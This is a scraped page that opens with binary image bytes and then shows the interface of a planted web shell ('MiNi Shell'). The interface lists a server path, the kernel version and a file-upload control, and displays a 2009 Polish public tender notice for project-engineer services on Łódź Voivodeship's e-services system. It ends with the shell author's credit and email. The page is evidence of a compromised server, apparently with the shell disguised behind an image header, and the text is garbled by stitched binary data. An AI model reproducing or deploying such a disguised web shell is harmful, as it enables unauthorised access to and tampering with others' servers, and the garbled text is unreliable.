JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090703/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090703/104933-N-2009.html

<p class="kh_header"><b>Łódź: Świadczenie usług Inżyniera projektu dla projektu Budowa Zintegrowanego Systemu e-Usług Publicznych Województwa Łódzkiego (Wrota Regionu Łódzkiego)</b><br>
<b>Numer ogłoszenia: 104933 - 2009; data zamieszczenia: 03.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Województwo  Łódzkie , al. Piłsudskiego 8, 90-051 Łódź, woj. łódzkie, tel. 042 6633385, 6633384, faks 042 6633391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lodzkie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług Inżyniera projektu dla projektu Budowa Zintegrowanego Systemu e-Usług Publicznych Województwa Łódzkiego (Wrota Regionu Łódzkiego).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług doradczych w zakresie i zarządzania realizacją projektu Budowa Zintegrowanego systemu e-Usług Województwa Łódzkiego. Szczegółówy Opis Przedmiotu Zamówienia zawiera załacznik Nr 1 do SIWZ (SOPZ).</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.42.00.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający określa wadium w wysokości: 5.000,00 zł<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia niżej wymienione warunki mogą być spełniane łącznie), tj.: 
2a) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej dwie usługi, których przedmiotem było prowadzenie projektów o wartości każdego projektu nie mniejszej niż 500 tys. zł brutto,
2b) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę, której przedmiotem było prowadzenie Biura projektów (odpowiedzialnego za zarządzanie projektem) przez okres co najmniej 6 miesięcy, 
2c) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę, której przedmiotem było:
a) wsparcie w zakresie kontroli jakości wdrożenia projektu informatycznego a w tym:
- kontrola realizacji wdrożeń i
- kontrola testów i odbiorów oraz wsparcie w testach oraz
b) wsparcie podczas odbiorów produktów projektu informatycznego - weryfikacja techniczna w zakresie zgodności z przyjętymi normami, standardami oraz z opracowaną specyfikacją wymagań oraz
c) przygotowanie oceny oraz projektu opinii co do produktów dostarczanych w ramach projektu informatycznego, w szczególności dotyczących:
- definicji wymagań funkcjonalnych oraz niefunkcjonalnych,
- dokumentacji technicznej wraz ze specyfikacjami technicznymi oraz modelami analitycznymi,
- dokumentacji testów odbiorczych wraz ze scenariuszami testowymi,
- scenariuszy wdrożeniowych oraz harmonogramów ich realizacji,
- dokumentacji bezpieczeństwa,
2d) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę, której przedmiotem było wsparcie Zamawiającego w zakresie postępowania o udzielenie zamówienia publicznego prowadzonego według ustawy Prawo zamówień publicznych, tj.:
a) przygotowywanie i opiniowanie Specyfikacji Istotnych Warunków Zamówienia (SIWZ) dla zamówienia publicznego o szacunkowej wartości równej lub przekraczającej kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych, a w szczególności:
-określanie warunków udziału w postępowaniu i sposobu oceny ich spełniania, 
-określanie dokumentów potwierdzających spełnienie warunków udziału w postępowaniu,
-formułowanie propozycji dotyczących opisu przedmiotu zamówienia,
-określanie miar jakości,
-określanie kryteriów oceny ofert wraz z podaniem ich znaczenia i sposobu oceny ofert,
-formułowanie istotnych dla stron postanowień, które zostaną wprowadzone do treści zawieranych umów w sprawie zamówienia publicznego, ogólnych warunków umowy lub wzoru umowy, i
b) rekomendowanie trybu przeprowadzenia postępowania o udzielenie zamówienia publicznego zgodnego z ustawą Prawo zamówień publicznych, i
c) zapewnienie wsparcia w zakresie udzielania wyjaśnień dotyczących treści SIWZ, a także w zakresie zmian treści SIWZ, i
2e) w okresie trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę, której przedmiotem było świadczenie usługi doradztwa prawnego i wsparcia Zamawiającego w wystąpieniach przed Krajową Izbą Odwoławczą (lub Zespołem Arbitrów) i Sądem Okręgowym, przygotowywanie projektów pism Zamawiającego na potrzeby postępowania protestacyjnego, postępowania odwoławczego i przed Sądem Okręgowym.
2f) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę, której przedmiotem były szkolenia lub mentoring (wsparcie szkoleniowo-doradcze) w zakresie prowadzenia projektów 
2g) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę, której przedmiotem było prowadzenie  rozliczeń zgodnie z wymaganiami obowiązującymi przy dofinansowaniu z Europejskiego Funduszu Rozwoju Regionalnego i przygotowywanie dokumentacji zamykającej projekt zgodnie z wymaganiami obowiązującymi przy dofinansowaniu z Europejskiego Funduszu Rozwoju Regionalnego
2h) w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej  jedną usługę, obejmującą łącznie co najmniej pięć obszarów spośród wskazanych poniżej:
a) wsparcie w zakresie realizacji projektu dotyczącego wdrożenia elektronicznego systemu obiegu dokumentów i spraw
b) wsparcie w zakresie realizacji projektu dotyczącego usług multimedialnych polegających na przekazywaniu on-line i off-line obrazu i dźwięku za pośrednictwem Internetu
c) wsparcie w opracowywaniu architektury systemów informatycznych 
d) wsparcie w zakresie bezpieczeństwa systemów informatycznych poprzez np. opracowanie Polityki Bezpieczeństwa Informacji lub zagadnień dotyczących ochrony danych osobowych 
e) wytwarzanie oprogramowania realizowane z zastosowaniem jednej z uznanych metodyk  np. Agile, Rational Unified Process (RUP), Microsoft Solution Framework (MSF)
f) wsparcie w zakresie przygotowania systemu informatycznego do eksploatacji bądź w zakresie organizacji służb wsparcia informatycznego.
2i) dysponują następującymi osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia następujących osób zdolnych do wykonania zamówienia:
a) kierownik projektu - osoba:
- posiadająca wykształcenie wyższe
- posiadająca certyfikat PRINCE 2 na poziomie co najmniej Foundation lub certyfikat PMP lub inny równoważny oraz kwalifikacje w zarządzaniu projektami informatycznymi w metodologii PRINCE 2 lub PMI lub innej równoważnej  
- posiadającą co najmniej 18 miesięczne doświadczenie w profesjonalnym zarządzaniu realizacją projektów informatycznych o łącznej wartości co najmniej 500 tys. PLN brutto,  
b) ekspert ds. prawnych - osoba:
- posiadająca wykształcenie wyższe prawnicze,
- posiadająca praktyczną znajomość ustawy Prawo zamówień publicznych, potwierdzoną udziałem w roli kierownika Zamawiającego albo osoby, której kierownik Zamawiającego powierzył wykonywanie zastrzeżonych dla niego czynności albo członka komisji przetargowej albo biegłego w co najmniej trzech postępowaniach o udzielenie zamówienia publicznego o wartości równej lub przekraczającej kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy Prawo zamówień publicznych;
c) ekspert ds. rozliczeń - osoba:
- posiadająca wykształcenie wyższe,
- legitymująca się doświadczeniem w prowadzeniu wszelkich rozliczeń zgodnie z wymaganiami obowiązującymi przy dofinansowaniu z Europejskiego Funduszu Rozwoju Regionalnego przynajmniej w jednym projekcie,
- legitymująca się doświadczeniem w przygotowywaniu projektów niezbędnych wniosków o płatność, sprawozdań, oświadczeń, etc., zgodnie z wymaganiami obowiązującymi przy dofinansowaniu z Europejskiego Funduszu Rozwoju Regionalnego przynajmniej w jednym projekcie,
- legitymująca się doświadczeniem w przygotowywaniu dokumentacji zamykającej przynajmniej jeden projekt zgodnie z wymaganiami obowiązującymi przy dofinansowaniu z Europejskiego Funduszu Rozwoju Regionalnego;
d) ekspert ds. systemu elektronicznego obiegu dokumentów i spraw - osoba:
- posiadająca wykształcenie wyższe w zakresie informatyki,
- legitymująca się udziałem w realizacji co najmniej jednego projektu informatycznego o wartości co najmniej 300 tys. PLN, w którym odpowiadała za projektowanie lub wdrażanie systemu elektronicznego obiegu dokumentów i spraw 
e) ekspert do spraw bezpieczeństwa informacji - osoba:
- posiadająca wykształcenie wyższe
- legitymująca się certyfikatem potwierdzającym znajomość zagadnień projektowania systemów zarządzania bezpieczeństwem informacji wg normy ISO/IEC 17799:2005 lub PL- ISO/IEC 17799:2007 lub innym równoważnym certyfikatem
f) ekspert do spraw infrastruktury IT - osoba:
- posiadająca wykształcenie wyższe
- legitymująca się certyfikatem MCSE (Microsoft Certified Systems Engineer ) przynajmniej lub RHCE (Red Hut CertifIed Engineer) lub innym równoważnym certyfikatem
g) ekspert do spraw eksploatacji systemów informatycznych - osoba:
- posiadająca wykształcenie wyższe
- legitymująca się certyfikatem ITIL Service Manager lub certyfikatem COBIT lub innym równoważnym 
- legitymująca się udziałem w realizacji co najmniej jednego projektu informatycznego o wartości co najmniej 300 tys. PLN, w którym nadzorowała przekazanie systemu informatycznego do eksploatacji, zapewniając wsparcie informatyczne
f) Zastępca Kierownika projektu - osoba: 
- posiadająca wykształcenie wyższe
- która odbyła szkolenie z zakresu prowadzenie projektów wg metodologii PRINCE 2 lub PMI lub innej równoważnej. 
Wykonawca może wskazać tą samą osobę na maksymalnie dwie z powyższych ról projektowych.
2k) dysponują następującym narzędziem technicznym, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia takiego narzędzia:
- dysponują lub będą dysponować systemem informatycznym pozwalającym na efektywne przydzielanie i zarządzanie zadaniami rozproszonego zespołu, 
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia niżej wymienione warunki mogą być spełniane łącznie), tj.: 
3a) osiągnęli w ostatnim roku obrotowym, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przychód ze sprzedaży usług w wysokości co najmniej 350.000 PLN ;
3b) posiadają środki finansowe lub posiadają zdolność kredytową w wysokości co najmniej 350.000,00 PLN.
3c) posiadają ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności w wysokości co najmniej 350.000,PLN 
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia żaden z wykonawców nie podlega wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 1-9 i ust. 2 pkt 1-3 ustawy Prawo zamówień publicznych, wspólnie wykonawcy nie podlegają wykluczeniu z postępowania na podstawie art. 24 ust. 1 pkt 10 i ust. 2 pkt 4 ustawy Prawo zamówień publicznych).
UWAGA! Jeżeli w oświadczeniach lub dokumentach potwierdzających spełnianie warunków udziału w postępowaniu, złożonych przez wykonawcę, kwoty będą wyrażone w walucie innej niż złote, Zamawiający przeliczy te kwoty na złote po średnim kursie NBP dla danej waluty, obowiązującym w dniu zamieszczenia niniejszego ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. 
Ocena spełnienia ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt 7 niniejszej SIWZ. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż ww. warunki Wykonawca spełnił..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 Ustawy, Zamawiający wymaga dołączenia do oferty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujących dokumentów:
 - oświadczenia Wykonawcy o spełnieniu warunków z art. 22 ust. 1 Ustawy według Załącznika do SIWZ Nr 3,
 - oświadczenia Wykonawcy o nie podleganiu wykluczeniu z postępowania według Załącznika do SIWZ Nr 4,
 - aktualnego odpisu z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
 - aktualnych zaświadczeń właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
 - aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 Ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
 - aktualnej informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 Ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2) W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia (lub że potencjał techniczny i osoby zdolne do wykonania zamówienia zostaną mu udostępnione), Zamawiający wymaga dołączenia do oferty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujących dokumentów:
 - wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, według Załącznika do SIWZ Nr 5a, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie. Wykaz ma potwierdzać spełnianie warunków udziału w postępowaniu określonych w pkt 6 niniejszej SIWZ,
- wykazu osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, według Załącznika do SIWZ Nr 5b. Wykaz ma potwierdzać spełnianie warunków udziału w postępowaniu określonych w pkt 6 niniejszej SIWZ,
- pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie osób, o którym mowa powyżej, Wykonawca wskazał osoby, którymi będzie dysponował.
3) W celu potwierdzenia, że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający wymaga dołączenia do oferty w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez Wykonawcę następujących dokumentów:
- części sprawozdania finansowego tj. rachunku zysków i strat, a jeżeli sprawozdanie finansowe podlega badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również opinii o badanej części sprawozdania, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego innych dokumentów określających obroty oraz zobowiązania i należności - za okres ostatniego roku obrotowego, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres,
- informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy , wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
- polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
4) Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej dokumenty składa zgodnie z § 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. 2006 r. Nr 87, poz. 605 ze zm.).
5) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w konsorcjum). W takim przypadku ich oferta musi spełniać następujące wymagania:
 - Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich
w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego. Uwaga: treść pełnomocnictwa powinna dokładnie określać zakres umocowania,
 - dokumenty wymienione w pkt 1) każdy z Wykonawców składa oddzielnie, przy czym oświadczenie o spełnieniu warunków z art. 22 ust. 1 Ustawy według Załącznika do SIWZ Nr 3 oraz oświadczenie o nie podleganiu wykluczeniu z postępowania według Załącznika do SIWZ Nr 4 Wykonawcy składają wspólnie, pozostałe dokumenty składa jeden albo więcej Wykonawców, tak aby potwierdzić spełnianie warunków udziału w postępowaniu..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.lodzkie.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Marszałkowski w Łodzi
Departament Organizacyjny
Wydział ds. Zamówień Publicznych
al. Piłsudskiego 8
90-051 Łódź
pok. 407, p. IV.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.07.2009 godzina 12:00, miejsce: Urząd Marszałkowski w Łodzi
Departament Organizacyjny
Biuro Podawcze (Kancelaria)
al. Piłsudskiego 8
90-051 Łódź
pok. 403, p. IV.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com